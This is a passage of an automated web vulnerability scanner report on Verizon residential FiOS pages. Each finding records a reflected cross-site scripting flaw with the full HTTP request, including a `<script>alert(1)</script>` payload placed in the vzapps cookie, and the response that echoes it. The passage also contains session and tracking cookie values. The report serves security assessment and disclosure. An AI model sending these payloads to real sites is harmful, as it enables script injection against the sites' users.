Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8D1DE'><SCRIPT>ALERT(1)</SCRIPT>C5602C17654 ' />
...[SNIP]...

3.165. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 46d05<script>alert(1)</script>d1f2b7396b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX46d05<script>alert(1)</script>d1f2b7396b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 00:14:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX46d05<script>alert(1)</script>d1f2b7396b5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX46D05<SCRIPT>ALERT(1)</SCRIPT>D1F2B7396B5 </DIV>
...[SNIP]...

3.166. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 97b68<script>alert(1)</script>c16b73f542d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX97b68<script>alert(1)</script>c16b73f542d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117590
Expires: Sat, 20 Nov 2010 00:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX97b68<script>alert(1)</script>c16b73f542d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX97B68<SCRIPT>ALERT(1)</SCRIPT>C16B73F542D </DIV>
...[SNIP]...

3.167. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee786'><script>alert(1)</script>78ce639b9c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXee786'><script>alert(1)</script>78ce639b9c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119134
Expires: Sat, 20 Nov 2010 00:12:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=TXee786'><script>alert(1)</script>78ce639b9c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEE786'><SCRIPT>ALERT(1)</SCRIPT>78CE639B9C ' />
...[SNIP]...

3.168. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 513ee<script>alert(1)</script>274881b5bf8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX513ee<script>alert(1)</script>274881b5bf8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148890
Expires: Sat, 20 Nov 2010 00:12:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:18 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX513EE<SCRIPT>ALERT(1)</SCRIPT>274881B5BF8 </DIV>
...[SNIP]...

3.169. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c469d'><script>alert(1)</script>c411bde7de8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc469d'><script>alert(1)</script>c411bde7de8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148894
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC469D'><SCRIPT>ALERT(1)</SCRIPT>C411BDE7DE8 ' />
...[SNIP]...

3.170. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a42'><script>alert(1)</script>fbf87ca090d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb3a42'><script>alert(1)</script>fbf87ca090d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=TXb3a42'><script>alert(1)</script>fbf87ca090d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB3A42'><SCRIPT>ALERT(1)</SCRIPT>FBF87CA090D ' />
...[SNIP]...

3.171. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 184ee<script>alert(1)</script>f56d57ce32c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX184ee<script>alert(1)</script>f56d57ce32c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102481
Expires: Sat, 20 Nov 2010 00:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX184ee<script>alert(1)</script>f56d57ce32c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX184EE<SCRIPT>ALERT(1)</SCRIPT>F56D57CE32C </DIV>
...[SNIP]...

3.172. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18907'><script>alert(1)</script>cc88d71fd80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18907'><script>alert(1)</script>cc88d71fd80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 00:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX18907'><script>alert(1)</script>cc88d71fd80; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18907'><SCRIPT>ALERT(1)</SCRIPT>CC88D71FD80 ' />
...[SNIP]...

3.173. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9ef9c<script>alert(1)</script>ac3a5bc187c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9ef9c<script>alert(1)</script>ac3a5bc187c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79332
Expires: Sat, 20 Nov 2010 00:13:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:13 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX9ef9c<script>alert(1)</script>ac3a5bc187c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9EF9C<SCRIPT>ALERT(1)</SCRIPT>AC3A5BC187C </DIV>
...[SNIP]...

3.174. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f58f'><script>alert(1)</script>45f51d22094 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8f58f'><script>alert(1)</script>45f51d22094; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110658
Expires: Sat, 20 Nov 2010 00:12:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=TX8f58f'><script>alert(1)</script>45f51d22094; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8F58F'><SCRIPT>ALERT(1)</SCRIPT>45F51D22094 ' />
...[SNIP]...

3.175. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8e5cb<script>alert(1)</script>29788bcdb3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
